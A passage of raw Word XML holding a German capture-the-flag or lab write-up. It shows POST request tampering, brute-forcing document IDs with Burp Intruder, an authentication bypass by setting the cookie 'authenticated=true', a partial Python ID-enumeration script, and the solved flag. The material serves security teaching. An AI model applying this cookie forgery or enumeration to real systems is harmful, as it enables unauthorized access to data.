            <wp:effectExtent l="0" t="0" r="9525"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715645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C64AB65" w14:textId="204AAC98" w:rsidR="007D3FD1" w:rsidRDefault="007D3FD1" w:rsidP="007D3FD1">
      <w:r>
        <w:t>Decode Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5128456A" w14:textId="02AD204E" w:rsidR="007D3FD1" w:rsidRDefault="007D3FD1" w:rsidP="00F45AB5">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68E034C9" wp14:editId="30CF1DE5">
            <wp:extent cx="3028384" cy="1563390"/>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6173" cy="1572574"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BCEFCE" w14:textId="5DCD361C" w:rsidR="007D3FD1" w:rsidRDefault="007D3FD1" w:rsidP="00F45AB5">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24A1B819" w14:textId="114E691D" w:rsidR="007D3FD1" w:rsidRDefault="007D3FD1" w:rsidP="007D3FD1">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc438856"/>
      <w:r>
        <w:t>Find Flag document:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="082326D3" w14:textId="217FC9A2" w:rsidR="00D817EE" w:rsidRPr="00D817EE" w:rsidRDefault="00D817EE" w:rsidP="00D817EE">
      <w:r>
        <w:t xml:space="preserve">Im nächsten Schritt soll ein </w:t>
      </w:r>
      <w:r w:rsidR="009F5D93">
        <w:t>„flag document“ gefunden werden, dass eine bestimmte ID besitzt.</w:t>
      </w:r>
      <w:r w:rsidR="00CB6587">
        <w:t xml:space="preserve"> Zum Zugriff m</w:t>
      </w:r>
      <w:r w:rsidR="00426DF5">
        <w:t xml:space="preserve">uss der </w:t>
      </w:r>
      <w:r w:rsidR="002E5E1B">
        <w:t>versendete Request</w:t>
      </w:r>
      <w:r w:rsidR="00426DF5">
        <w:t xml:space="preserve"> jedoch mehrfach angepasst werden</w:t>
      </w:r>
      <w:r w:rsidR="002E5E1B">
        <w:t>. Dies ist nachfolgend in Stichworten beschrieben.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B06D554" w14:textId="595AFA72" w:rsidR="007D3FD1" w:rsidRDefault="007D3FD1" w:rsidP="007D3FD1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="689F0C73" wp14:editId="22133C1D">
            <wp:extent cx="5400675" cy="9398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939800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BAD653" w14:textId="7A9D27C2" w:rsidR="001A34F6" w:rsidRPr="008E799A" w:rsidRDefault="007D3FD1" w:rsidP="001A34F6">
      <w:r w:rsidRPr="008E799A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Burp: </w:t>
      </w:r>
      <w:r w:rsidR="003A5710" w:rsidRPr="008E799A">
        <w:t>Selber Request aber mit POST</w:t>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1246D124" w14:textId="131B3DBC" w:rsidR="007D3FD1" w:rsidRPr="009C0EA2" w:rsidRDefault="001A34F6" w:rsidP="001A34F6">
      <w:pPr>
        <w:pStyle w:val="Zitat"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00341489">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">„Woopsi, the "Content-Length" of your request must be 300, not more not less. </w:t>
      </w:r>
      <w:r w:rsidRPr="009C0EA2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Check what this header does and adjust your request....“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFD321C" w14:textId="76AF1D83" w:rsidR="001A34F6" w:rsidRPr="009C0EA2" w:rsidRDefault="001A34F6" w:rsidP="001A34F6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C0EA2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text zum Body</w:t>
      </w:r>
      <w:r w:rsidR="003A5710">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> hinzufügen</w:t>
      </w:r>
      <w:r w:rsidRPr="009C0EA2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, sodass die Länge 300 entspricht:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0707E4A8" w14:textId="77777777" w:rsidR="001A34F6" w:rsidRPr="00FF74EB" w:rsidRDefault="001A34F6" w:rsidP="001A34F6">
      <w:pPr>
        <w:pStyle w:val="Zitat"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C0EA2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Woopsi again, the "Content-Type" header must be set to "application/x-www-form-urlencoded". </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF74EB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>What does this mean for parameter-value pairs?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F9AE20" w14:textId="77777777" w:rsidR="001A34F6" w:rsidRPr="00B44BBA" w:rsidRDefault="001A34F6" w:rsidP="001A34F6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44BBA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nachdem der Header „Content-Type“ hinzugefügt und angepasst wurde kommt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D238092" w14:textId="77777777" w:rsidR="001A34F6" w:rsidRPr="00FF74EB" w:rsidRDefault="001A34F6" w:rsidP="001A34F6">
      <w:pPr>
        <w:pStyle w:val="Zitat"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF74EB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Next error: Your POST request body (not the request header) must contain a "date" parameter which the current server date in the following format: Y-m-d (example: 2018-08-25)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171C228D" w14:textId="580FD8B4" w:rsidR="001A34F6" w:rsidRDefault="00815D86" w:rsidP="001A34F6">
      <w:r>
        <w:t>Der Verlangte „date“-Parameter wurde hinzugefügt, außerdem ein „username“</w:t>
      </w:r>
      <w:r w:rsidR="001F7F9A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B33BCA">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="001F7F9A">
        <w:t xml:space="preserve"> Param</w:t>
      </w:r>
      <w:r w:rsidR="00B33BCA">
        <w:t>ter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> und ein „passcode</w:t>
      </w:r>
      <w:r w:rsidR="00B33BCA">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="001F7F9A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B33BCA">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="001F7F9A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B33BCA">
        <w:t xml:space="preserve">Parameter </w:t>
      </w:r>
      <w:r w:rsidR="001F7F9A">
        <w:t xml:space="preserve">mit dem Usernamen „jan“ </w:t>
      </w:r>
      <w:r w:rsidR="00B33BCA">
        <w:t>in Sha1</w:t>
      </w:r>
      <w:r w:rsidR="001F7F9A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B33BCA">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="001F7F9A" w:rsidRPr="001F7F9A">
        <w:t>14e793d896ddc8ca6911747228e86464cf420065</w:t>
      </w:r>
      <w:r w:rsidR="001F7F9A">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F94622" w14:textId="5322FE62" w:rsidR="001F7F9A" w:rsidRDefault="001F7F9A" w:rsidP="001A34F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DB0D6DF" wp14:editId="287E6EBD">
            <wp:extent cx="5400675" cy="189420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1894205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0085D776" w14:textId="666E5A80" w:rsidR="001F7F9A" w:rsidRDefault="0089145A" w:rsidP="001A34F6">
      <w:r>
        <w:t>Jetzt kann</w:t>
      </w:r>
      <w:r w:rsidR="001F7F9A">
        <w:t xml:space="preserve"> die Suche nach der korrekten ID zwischen 400 und 600</w:t>
      </w:r>
      <w:r w:rsidR="00A45E08">
        <w:t xml:space="preserve"> mit dem Intruder in Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gestartet werden</w:t>
      </w:r>
      <w:r w:rsidR="00BD2277">
        <w:t>. Die passenden Einstellungen sind in den nachfolgenden Screenshots zu erkennen</w:t>
      </w:r>
      <w:r w:rsidR="00786C34">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55596540" w14:textId="3702B14C" w:rsidR="00A45E08" w:rsidRPr="00786C34" w:rsidRDefault="00A45E08" w:rsidP="001A34F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00786C34">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A361A36" w14:textId="723BD2B9" w:rsidR="00A45E08" w:rsidRDefault="00A45E08" w:rsidP="001A34F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C0FF984" wp14:editId="07F84E50">
            <wp:extent cx="4361716" cy="2424897"/>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6878" cy="2427767"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDA2800" w14:textId="77777777" w:rsidR="007D3FD1" w:rsidRPr="007D3FD1" w:rsidRDefault="007D3FD1" w:rsidP="007D3FD1"/>
    <w:p w14:paraId="70A7AC5D" w14:textId="77777777" w:rsidR="0045634D" w:rsidRDefault="0045634D" w:rsidP="009D0667">
      <w:r>
        <w:t>Bei der ID 518 ist im Feld „Length“ eine Abweichung zu sehen. Wenn man die Response öffnet erhält man die Flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0060777B" w14:textId="57E39849" w:rsidR="009D0667" w:rsidRDefault="0045634D" w:rsidP="009D0667">
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="0045634D">
        <w:t>bat_b4t_v1ewer_{03c3524f25ae170f531d1337570ac4fe30154ca7d5a15ad4f9fff4c5}</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5156183D" w14:textId="225E58EB" w:rsidR="0045634D" w:rsidRDefault="0045634D" w:rsidP="009D0667">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15113FB2" wp14:editId="04563297">
            <wp:extent cx="5400675" cy="3922395"/>
            <wp:effectExtent l="0" t="0" r="9525"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3922395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1886058B" w14:textId="0AF40CCD" w:rsidR="0045634D" w:rsidRDefault="00270C25" w:rsidP="009D0667">
      <w:r>
        <w:t xml:space="preserve">Da hier die kostenlose Version von Burp verwendet wurde </w:t>
      </w:r>
      <w:r w:rsidR="00E66A95">
        <w:t>nahm dies einige Zeit in Ansp</w:t>
      </w:r>
      <w:r w:rsidR="001A149C">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00E66A95">
        <w:t xml:space="preserve">uch. In der gleichen Zeit kann man auch ein Python Skript zur </w:t>
      </w:r>
      <w:r w:rsidR="001A149C">
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00E66A95">
        <w:t>utomatisie</w:t>
      </w:r>
      <w:r w:rsidR="000B3B68">
        <w:t xml:space="preserve">rung schreiben. Die Entsprechende Datei findet sich </w:t>
      </w:r>
      <w:r w:rsidR="004B5F7F">
        <w:t>nach der Beschreibung zur Umgehung der Aut</w:t>
      </w:r>
      <w:r w:rsidR="001A149C">
        <w:t>hentifikation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272B2898" w14:textId="24BBC25B" w:rsidR="0045634D" w:rsidRDefault="00713FC4" w:rsidP="00713FC4">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc438857"/>
      <w:r>
        <w:t>Authentifizierung überspringen:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="521BE1D8" w14:textId="3769F48D" w:rsidR="00713FC4" w:rsidRDefault="00713FC4" w:rsidP="00713FC4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ECD722C" wp14:editId="13FB864B">
            <wp:extent cx="5400675" cy="146685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466850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA18D1E" w14:textId="1E7458BC" w:rsidR="00FA6849" w:rsidRPr="008D124A" w:rsidRDefault="00713FC4" w:rsidP="00713FC4">
      <w:r>
        <w:t xml:space="preserve">Wenn man sich den Request </w:t>
      </w:r>
      <w:r w:rsidR="00FA6849">
        <w:t>in Burp nach der Authentifizierung anschaut sieht man den Parameter authenticated=true</w:t>
      </w:r>
      <w:r w:rsidR="008D124A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FA6849">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D124A">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00FA6849">
        <w:t>etzt man diesen in einer nicht authentifizierten Session auf true ist man ebenfalls eingeloggt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F02E9A" w14:textId="77777777" w:rsidR="002357B3" w:rsidRPr="00FF74EB" w:rsidRDefault="00FA6849" w:rsidP="00713FC4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF74EB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cookie: PHPSESSID=89678vsbjo7vqj2ot1p7kcpdn3; username=jan; authenticated=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1206588D" w14:textId="77777777" w:rsidR="002357B3" w:rsidRDefault="002357B3" w:rsidP="00713FC4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DA9F399" wp14:editId="4E8B67F1">
            <wp:extent cx="5400675" cy="1495425"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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495425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D784D5" w14:textId="60AA9BA3" w:rsidR="00713FC4" w:rsidRDefault="002357B3" w:rsidP="002357B3">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
      </w:pPr>
      <w:r>
        <w:t>Neue Session</w:t>
      </w:r>
      <w:r w:rsidR="00FA6849">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C21B441" w14:textId="7C6394F4" w:rsidR="002357B3" w:rsidRDefault="002357B3" w:rsidP="00713FC4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2685453D" wp14:editId="5AFD7322">
            <wp:extent cx="5400675" cy="2408555"/>
            <wp:effectExtent l="0" t="0" r="952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408555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13565F7C" w14:textId="25F03FEF" w:rsidR="002357B3" w:rsidRDefault="002357B3" w:rsidP="002357B3">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
      </w:pPr>
      <w:r>
        <w:t>Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70417166" w14:textId="77777777" w:rsidR="002357B3" w:rsidRDefault="002357B3" w:rsidP="002357B3">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Setzt man nun die Session Id aus dem Set-Cookie-Header als Session Id in dem neuen Request als Cookie und setzt außerdem einen Usernamen, so kann man in dem neuen Request auch den Authenticated Parameter auf „true“ setzten und wird zugelassen als hätte man sich zuvor angemeldet.</w:t>
      </w:r>
      <w:r w:rsidRPr="002357B3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD1886C" w14:textId="2A14706C" w:rsidR="002357B3" w:rsidRDefault="002357B3" w:rsidP="002357B3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7629BA2B" wp14:editId="6D7A1A5F">
            <wp:extent cx="5400675" cy="1468120"/>
            <wp:effectExtent l="0" t="0" r="9525"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1468120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D299A47" w14:textId="154ED984" w:rsidR="002357B3" w:rsidRDefault="002357B3" w:rsidP="002357B3">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
      </w:pPr>
      <w:r>
        <w:t>Neuer Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFB6C9B" w14:textId="0D4C5FD6" w:rsidR="002357B3" w:rsidRDefault="002357B3" w:rsidP="002357B3">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C95CA5D" wp14:editId="598121A8">
            <wp:extent cx="4514850" cy="3057525"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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4850" cy="3057525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46055DB9" w14:textId="06639377" w:rsidR="002357B3" w:rsidRDefault="002357B3" w:rsidP="002357B3">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
      </w:pPr>
      <w:r>
        <w:t>Zugehörige Antwort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351CF82D" w14:textId="4B7E77D4" w:rsidR="000D4860" w:rsidRDefault="00EA43D2" w:rsidP="004A6AB9">
      <w:pPr>
        <w:pStyle w:val="berschrift4"/>
      </w:pPr>
      <w:r>
        <w:t>Python Skript zur Automatisierung der id-Abfrage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6723FD04" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAE7325" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41843379" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>protocoll = "http://"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B78B6B" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>host = "10.85.229.47"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276C2EE9" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>path = "/view_document.php?document_id="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C506C78" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>URL = protocoll + host + path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345E30E7" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C86EAC2" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>headers = {'cookie': 'PHPSESSID=btb9eckea9o63vakab95od5s36; authenticated=true'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE8C9F9" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="439949D2" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>start = 400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB1DA93" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>end = 600</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441B18B6" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E8FD9C1" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>print(URL + '?')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA1A092" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0699EA9E" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>compare_url = URL + '1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CA6040" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>t = requests.post(url = compare_url, headers = headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DB6193" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>compare_length = t.headers['content-length']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523B1493" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F9132E1" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>while start &lt;= end:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4059B5A9" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>#print('id =' + str(start))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9AD8A7" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>temp_url = URL + str(start)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B766AB6" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>r = requests.post(url = temp_url, headers = headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E8C579" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>#print('length =' + r.headers['content-length'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EC8873" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>#print(r.content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113B8749" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
